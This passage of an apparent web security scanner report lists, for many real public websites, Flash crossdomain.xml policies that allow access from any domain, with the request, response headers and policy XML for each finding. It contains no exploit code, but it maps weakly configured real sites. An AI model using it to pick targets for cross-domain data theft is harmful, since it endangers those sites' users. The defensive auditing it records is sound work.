The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ew.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:12 GMT
Server: Apache
Last-Modified: Fri, 24 Sep 2010 16:23:49 GMT
ETag: "373-cdb58f40"
Accept-Ranges: bytes
Content-Length: 883
Content-Type: application/xml
Vary: Accept-Encoding,X-Catmap-Header
P3P: CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi OTRo IND DSP CAO COR'
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow-access-from domain="img2.timeinc.net"/>
<allow-access-from domain="img2-short.timeinc.net"/>
<allow-access-from domain="*.aol.com"/>
<allow-access-from domain="*.digitalcity.com"/>
<allow-access-from domain="*.aolcdn.com"/>
<allow-access-from domain="*.channel.aol.com"/>
<allow-access-from domain="*.aimtoday.com"/>
<allow-access-from domain="*.aimtoday.aim.com"/>
<allow-access-from domain="*.dashboard.aim.com"/>
<allow-access-from domain="*.aim.com"/>
<allow-access-from domain="peopleconnection.aol.com"/>
<allow-access-from domain="*.peoplecmg.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
<allow-access-from domain="*.taaz.com" secure="true"/>
...[SNIP]...
7.57. http://www.ez-tracks.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ez-tracks.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ez-tracks.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 02 Apr 2011 14:14:23 GMT
Content-Length: 208
Content-Type: text/xml
Content-Location: http://www.ez-tracks.com/crossdomain.xml
Last-Modified: Wed, 01 Dec 2004 14:18:24 GMT
Accept-Ranges: bytes
ETag: "12a73b9eb0d7c41:cb57"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-pol
...[SNIP]...
7.58. http://www.flixster.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.flixster.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.flixster.com

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:51:52 GMT
Server: Apache
Last-Modified: Thu, 31 Mar 2011 20:44:51 GMT
ETag: "64"
Accept-Ranges: bytes
Content-Length: 100
Cache-Control: max-age=86400
Expires: Sun, 03 Apr 2011 13:51:52 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
7.59. http://www.freeonlinegames.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.freeonlinegames.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.freeonlinegames.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:17 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 30 Nov 2010 17:53:10 GMT
ETag: "180823b-a5-dc9e0d80"
Accept-Ranges: bytes
Content-Length: 165
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*" />
</cross-domain-policy>
7.60. http://www.g4tv.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.g4tv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.g4tv.com

Response

HTTP/1.0 200 OK
X-Cnection: close
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/xml
Content-Length: 208
Cache-Control: private, max-age=58266
Date: Sat, 02 Apr 2011 13:40:33 GMT
Connection: close
X-N: S

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...
7.61. http://www.gamerdna.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gamerdna.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.gamerdna.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:31:55 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 PHP/5.2.5
Last-Modified: Sat, 22 Nov 2008 02:54:30 GMT
ETag: "7bce-a2-45c3e47d96580"
Accept-Ranges: bytes
Content-Length: 162
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>
7.62. http://www.gamesradar.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gamesradar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.gamesradar.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:56 GMT
Server: Apache/2.2.11 (Ubuntu) mod_jk/1.2.26
Last-Modified: Tue, 04 May 2010 19:20:06 GMT
ETag: "2bc0006-1cc-485c998d72580"
Accept-Ranges: bytes
Content-Length: 460
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="gr22static.gamesradar.com" />
   <allow-access-from domain="static22.gamesradar.com" />
...[SNIP]...
<allow-access-from domain="*.serving-sys.com" />
   <allow-access-from domain="*" />
...[SNIP]...
7.63. http://www.gametrailers.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gametrailers.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.gametrailers.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) PHP/5.3.2
Last-Modified: Wed, 02 Feb 2011 00:17:00 GMT
ETag: "1268c463d-cf-49b4191509700"
Accept-Ranges: bytes
Content-Length: 207
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:37:31 GMT
Connection: close
Set-Cookie: ak-mobile-detected=no; expires=Sat, 02-Apr-2011 19:37:31 GMT; path=/
Vary: User-Agent

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...
7.64. http://www.gourmandia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gourmandia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.gourmandia.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:42 GMT
Server: Apache
Last-Modified: Thu, 19 Aug 2010 21:34:46 GMT
ETag: "66880b1-ce-f3774980"
Accept-Ranges: bytes
Content-Length: 206
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...
7.65. http://www.greenwichmeantime.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.greenwichmeantime.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.greenwichmeantime.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:58:32 GMT
Server: Apache/2.0.63 (Red Hat)
Last-Modified: Sat, 20 Mar 2010 13:46:58 GMT
ETag: "c8c8aa-100-b408ce80"
Accept-Ranges: bytes
Content-Length: 256
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>


<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">


<cross-domain-policy>


<allow-access-from domain="*" />
...[SNIP]...
7.66. http://www.groupon.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.groupon.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.groupon.com

Response

HTTP/1.0 200 OK
Server: nginx/0.7.65
Content-Type: text/xml
Accept-Ranges: bytes
Age: 164396
Date: Sat, 02 Apr 2011 13:32:32 GMT
Last-Modified: Thu, 18 Nov 2010 03:41:54 GMT
Content-Length: 352
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="*" to-ports="80,443" secure="false" />
...[SNIP]...
7.67. http://www.health.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.health.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.health.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:14 GMT
Server: Apache
Last-Modified: Fri, 24 Sep 2010 16:23:49 GMT
ETag: "373-cdb58f40"
Accept-Ranges: bytes
Content-Length: 883
Content-Type: application/xml
Vary: Accept-Encoding,X-Catmap-Header
P3P: CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi OTRo IND DSP CAO COR'
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow-access-from domain="img2.timeinc.net"/>
<allow-access-from domain="img2-short.timeinc.net"/>
<allow-access-from domain="*.aol.com"/>
<allow-access-from domain="*.digitalcity.com"/>
<allow-access-from domain="*.aolcdn.com"/>
<allow-access-from domain="*.channel.aol.com"/>
<allow-access-from domain="*.aimtoday.com"/>
<allow-access-from domain="*.aimtoday.aim.com"/>
<allow-access-from domain="*.dashboard.aim.com"/>
<allow-access-from domain="*.aim.com"/>
<allow-access-from domain="peopleconnection.aol.com"/>
<allow-access-from domain="*.peoplecmg.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
<allow-access-from domain="*.taaz.com" secure="true"/>
...[SNIP]...
7.68. http://www.hiconversion.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hiconversion.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hiconversion.com

Response

HTTP/1.1 200 OK
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:58:17 GMT
ETag: W/"104-1301603701000"
Last-Modified: Thu, 31 Mar 2011 20:35:01 GMT
Server: Apache/2.2.9 (Fedora)
Vary: Accept-Encoding
Content-Length: 104
Connection: Close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
7.69. http://www.hodesiq.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hodesiq.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hodesiq.com

Response

HTTP/1.1 200 OK
Content-Length: 208
Content-Type: text/xml
Last-Modified: Mon, 20 Jul 2009 17:51:43 GMT
Accept-Ranges: bytes
ETag: "dbdeeabd629ca1:aea"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:13:43 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...
7.70. http://www.hollywoodreporter.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hollywoodreporter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hollywoodreporter.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: text/xml
Last-Modified: Sun, 10 Oct 2010 23:05:43 GMT
Content-Length: 193
Cache-Control: max-age=60
Expires: Sat, 02 Apr 2011 13:45:55 GMT
Date: Sat, 02 Apr 2011 13:44:55 GMT
Connection: close

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*" />
   <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>
7.71. http://www.howstuffworks.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.howstuffworks.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.howstuffworks.com

Response

HTTP/1.0 200 OK
Server: ATS/2.1.6-unstable
Last-Modified: Sat, 02 Apr 2011 13:00:32 GMT
P3P: CP="ALL DSP COR CUR ADMo DEVo TAIo PSAo PSDo IVAo CONi OTPi OUR NOR UNI"
Content-Length: 200
Content-Type: text/xml; charset=UTF-8
Date: Sat, 02 Apr 2011 13:23:54 GMT
Connection: close
Set-Cookie: target=us; path=/; domain=.howstuffworks.com
Expires: Sat, 02 Apr 2011 14:00:00 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
7.72. http://www.huffingtonpost.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.huffingtonpost.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.8 (Unix)
Last-Modified: Thu, 01 Jul 2010 13:55:20 GMT
ETag: "26e2850-fd-48a53d22e2200"
Content-Type: application/xml
Date: Sat, 02 Apr 2011 12:37:46 GMT
Content-Length: 253
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy><allow-access-from domain="*" /><allow-http-request-headers
...[SNIP]...
7.73. http://www.imagebam.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.imagebam.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.imagebam.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:30 GMT
Server: Apache
Last-Modified: Sat, 21 Aug 2010 15:06:52 GMT
ETag: "63bda7-cb-48e56c3e8fb00"
Accept-Ranges: bytes
Content-Length: 203
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...
7.74. http://www.imageshack.us/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.imageshack.us
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.imageshack.us

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Sat, 02 Apr 2011 13:31:41 GMT
Content-Type: text/xml
Content-Length: 1198
Last-Modified: Thu, 15 Jul 2010 21:31:01 GMT
Connection: close
Set-Cookie: is_uuid=fe9301e8d0274d608c047983f575fec4; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=.imageshack.us; path=/
P3P: CP="NOI CUR ADM OUR NOR STA NID"
X-Server-Name-And-Port: _:14000
Accept-Ranges: bytes

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from headers="*" secure="false" domain="*.imageshack.us" />
<allow-http-requ
...[SNIP]...
7.75. http://www.ingdirect.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ingdirect.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ingdirect.com

Response

HTTP/1.1 200 OK
Connection: close
Server: Microsoft-IIS/7.0
Content-Type: text/xml
Last-Modified: Thu, 26 Feb 2009 18:21:42 GMT
Date: Sat, 02 Apr 2011 13:43:45 GMT
Content-Length: 209
ETag: "pv26ac04c4b7dfa765f73411be4237c54b"
X-PvInfo: [S10232.C6966.A37933.RA0.G94E8.U62A8AA9F].[OT/xml.OG/pages]
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...
7.76. http://www.instructables.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.instructables.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.instructables.com

Response

HTTP/1.1 200 OK
Server: Resin/3.0.28
P3P: IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA
ETag: "DV9F16DWcqJ"
Last-Modified: Sat, 15 Jan 2011 00:26:28 GMT
Content-Type: text/xml
Content-Length: 201
X-Cacheable: YES - 30 minutes
Cache-Control: no-cache
Date: Sat, 02 Apr 2011 13:36:03 GMT
X-Varnish: 4054888881 4054848118
Age: 408
Via: 1.1 varnish
X-Cache-Svr: squid02.instructables.com
X-Cache: HIT
X-Cache-Hits: 18
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...
7.77. http://www.instyle.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.instyle.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.instyle.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:04:57 GMT
Server: Apache
Last-Modified: Fri, 24 Sep 2010 16:23:49 GMT
ETag: "373-cdb58f40"
Accept-Ranges: bytes
Content-Length: 883
Content-Type: application/xml
Vary: Accept-Encoding,X-Catmap-Header
P3P: CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi OTRo IND DSP CAO COR'
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow-access-from domain="img2.timeinc.net"/>
<allow-access-from domain="img2-short.timeinc.net"/>
<allow-access-from domain="*.aol.com"/>
<allow-access-from domain="*.digitalcity.com"/>
<allow-access-from domain="*.aolcdn.com"/>
<allow-access-from domain="*.channel.aol.com"/>
<allow-access-from domain="*.aimtoday.com"/>
<allow-access-from domain="*.aimtoday.aim.com"/>
<allow-access-from domain="*.dashboard.aim.com"/>
<allow-access-from domain="*.aim.com"/>
<allow-access-from domain="peopleconnection.aol.com"/>
<allow-access-from domain="*.peoplecmg.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
<allow-access-from domain="*.taaz.com" secure="true"/>
...[SNIP]...
7.78. http://www.intellicast.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.intellicast.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.intellicast.com

Response

HTTP/1.1 200 OK
Content-Length: 136
Content-Type: text/xml
Content-Location: http://www.intellicast.com/crossdomain.xml
Last-Modified: Mon, 15 Feb 2010 17:02:22 GMT
Accept-Ranges: bytes
ETag: "e4451aa460aeca1:30d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:06:22 GMT
Connection: close
Set-Cookie: NSC_jdbtu_efgbvmu_iuuq_wt=ffffffff094a140b45525d5f4f58455e445a4a423660;expires=Sat, 02-Apr-2011 14:26:25 GMT;path=/;httponly

...<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" to-ports="*" secure = "true"/>
</cross-domain-policy>
7.79. http://www.kaboodle.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kaboodle.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kaboodle.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ss=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ss=""; Path=/
ETag: W/"200-1301007108000"
Last-Modified: Thu, 24 Mar 2011 22:51:48 GMT
Content-Type: application/xml
Content-Length: 200
Date: Sat, 02 Apr 2011 13:30:55 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
7.80. http://www.like.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.like.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.like.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 13 Jan 2010 18:02:03 GMT
X-Like-Servetime: Servetime: D=603
Content-Type: application/xml
Vary: User-Agent
Date: Sat, 02 Apr 2011 13:55:28 GMT
Content-Length: 360
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only"/
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...
7.81. http://www.liveleak.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.liveleak.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.liveleak.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:41:09 GMT
Server: Apache
Last-Modified: Wed, 20 Aug 2008 11:50:42 GMT
ETag: "50284d-cd-48ac0512"
Accept-Ranges: bytes
Content-Length: 205
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...
7.82. http://www.manualsonline.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manualsonline.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

